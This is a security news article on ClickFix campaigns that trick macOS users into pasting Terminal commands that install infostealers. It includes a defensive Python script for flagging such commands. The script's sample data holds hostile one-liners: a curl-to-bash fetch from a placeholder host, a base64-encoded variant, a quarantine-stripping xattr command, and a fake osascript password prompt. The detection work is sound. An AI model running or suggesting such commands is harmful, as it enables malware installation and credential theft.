A new macOS malware campaign is drawing attention from security researchers: attackers are pairing social-engineering lures with malicious files to sidestep traditional defenses and steal sensitive data from Apple devices.
Threat intelligence reports highlight a technique known as ClickFix, in which victims are tricked into running the malicious command themselves rather than being compromised through a software vulnerability. The attack typically begins with a fake CAPTCHA or "verification" page that instructs the user to copy a command and paste it into the macOS Terminal. Running that command, usually a one-liner that downloads and executes the next stage, starts the infection without the victim realizing it.
Once executed, the command fetches and installs infostealer malware such as NotNullOSX or similar families, delivered through disguised files including malicious DMG installers. The payloads are built to look legitimate while quietly launching background processes that evade detection and establish persistence on the system.
Researchers note that this approach is dangerous precisely because it sidesteps many conventional protections. No exploit is involved, so exploit mitigations and browser sandboxing never come into play. Because the download is triggered from Terminal rather than through the browser, the fetched file does not receive the quarantine attribute a browser download would, so Gatekeeper is never consulted, and whatever the command runs executes with the full privileges of the logged-in user.
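As an added illustration (this is not code from the article or from the researchers it cites), the following Python script shows the kind of heuristic a defender can run over command-line telemetry, such as shell history or EDR process-start events, to flag ClickFix-style one-liners: a download tool piped into an interpreter, a base64 blob decoded and executed, removal of the com.apple.quarantine attribute, or an AppleScript password prompt. The rule set, the sample command lines and the placeholder hostnames are all constructed for this example and are not indicators from the campaign described above.

```python
import base64
import re
import shlex

# Heuristic rule set: these are assumptions about what pasted ClickFix
# commands tend to look like, not indicators taken from the campaign itself.
DOWNLOAD_TOOLS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "python", "perl"}
QUARANTINE_RE = re.compile(r"xattr\s+(?:-c\b|-d\s+com\.apple\.quarantine)")
BASE64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/=]{24,}")


def _segments(cmd):
    """Split a command line on |, ||, && and ; and tokenise each piece.

    Deliberately crude: it ignores quoting around the separators, which is
    acceptable for a first-pass hunting filter.
    """
    segments = []
    for piece in re.split(r"\s*(?:\|\||&&|\||;)\s*", cmd):
        try:
            tokens = shlex.split(piece)
        except ValueError:  # unbalanced quotes
            tokens = piece.split()
        if tokens:
            segments.append(tokens)
    return segments


def _decoded_base64(cmd):
    """Return the UTF-8 text of every long base64-looking token that decodes cleanly."""
    out = []
    for tok in BASE64_TOKEN_RE.findall(cmd):
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except Exception:
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            out.append(text)
    return out


def classify(cmd, depth=0):
    """Return the list of reasons a command line looks like a ClickFix lure.

    An empty list means the line passed these heuristics, not that it is safe.
    """
    reasons = []
    # Program name of each pipeline segment, with any path prefix stripped.
    names = [seg[0].rsplit("/", 1)[-1] for seg in _segments(cmd)]

    # Rule 1: curl/wget whose output feeds a shell or other interpreter.
    for i, name in enumerate(names[:-1]):
        if name in DOWNLOAD_TOOLS and any(n in INTERPRETERS for n in names[i + 1:]):
            reasons.append("download piped to interpreter")
            break

    # Rule 2: a base64 blob decoded on the command line and handed to an interpreter.
    decoded = _decoded_base64(cmd)
    if decoded and "base64" in names and any(n in INTERPRETERS for n in names):
        reasons.append("base64 payload executed")
    # Recurse a bounded number of levels so the inner command is judged as well.
    if depth < 2:
        for inner in decoded:
            if classify(inner, depth + 1):
                reasons.append("encoded payload is itself suspicious")
                break

    # Rule 3: stripping the quarantine attribute so Gatekeeper never sees the file.
    if QUARANTINE_RE.search(cmd):
        reasons.append("quarantine attribute removed")

    # Rule 4: an AppleScript dialog with a hidden answer, a common way to phish the login password.
    if "osascript" in names and "with hidden answer" in cmd:
        reasons.append("password prompt via osascript")

    return reasons


def scan(command_lines):
    """Return [(command, reasons)] for every line that trips at least one rule."""
    flagged = []
    for cmd in command_lines:
        reasons = classify(cmd)
        if reasons:
            flagged.append((cmd, reasons))
    return flagged


# Constructed sample telemetry; the hostnames are placeholders, not real infrastructure.
_INNER = "curl -fsSL https://verify.example/payload | bash"
SAMPLE_COMMANDS = [
    "brew update && brew upgrade",
    "curl -sSL -o notes.pdf https://example.com/notes.pdf",
    "git pull origin main",
    "curl -fsSL https://verify.example/fix.sh | bash",
    "echo " + base64.b64encode(_INNER.encode()).decode() + " | base64 -d | sh",
    "xattr -d com.apple.quarantine ~/Downloads/Installer.dmg && open ~/Downloads/Installer.dmg",
    "osascript -e 'display dialog \"macOS needs your password to continue\" default answer \"\" with hidden answer'",
]

if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_COMMANDS):
        print(f"{cmd}\n    -> {', '.join(reasons)}")
```

The first three sample lines are ordinary developer activity and pass; the remaining four trip one or more rules. Rule 1 is the core ClickFix signal, and the base64 rule matters because lures often encode the real command to defeat naive string matching, which is why the decoded text is classified again.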
The malware's capabilities are extensive. Once installed, it can harvest browser credentials, extract macOS Keychain data, raid cryptocurrency wallets, and collect sensitive local files such as developer secrets stored on the device. The stolen data is then exfiltrated to attacker-controlled servers, usually with no visible sign to the victim. Because the login Keychain is encrypted with the user's account password, a pasted command that then prompts for that password is itself a strong warning sign.
Security experts warn that ClickFix campaigns, which first became popular against Windows systems, are now being adapted to macOS users, signaling a broader shift in attacker focus. The method's growing adoption reflects a trend toward user-assisted attacks, in which the human rather than a software flaw is the primary point of failure.
The rise of such campaigns also matches broader findings from threat intelligence reports, which show attackers increasingly relying on simple but effective techniques to scale operations and bypass defenses. As these tactics spread, even less sophisticated threat actors can deploy capable malware with minimal technical effort.
Cybersecurity professionals urge users to stay cautious, stressing that no legitimate website will ask a visitor to run a Terminal command to prove they are human. Avoiding unknown downloads, especially DMG files from untrusted sources, keeping macOS and security tooling up to date, and treating any "copy this into Terminal" instruction as a phishing attempt are the key defenses. For defenders, a Terminal session that spawns curl or a shell shortly after a browser visit is a useful hunting signal for this kind of lure.
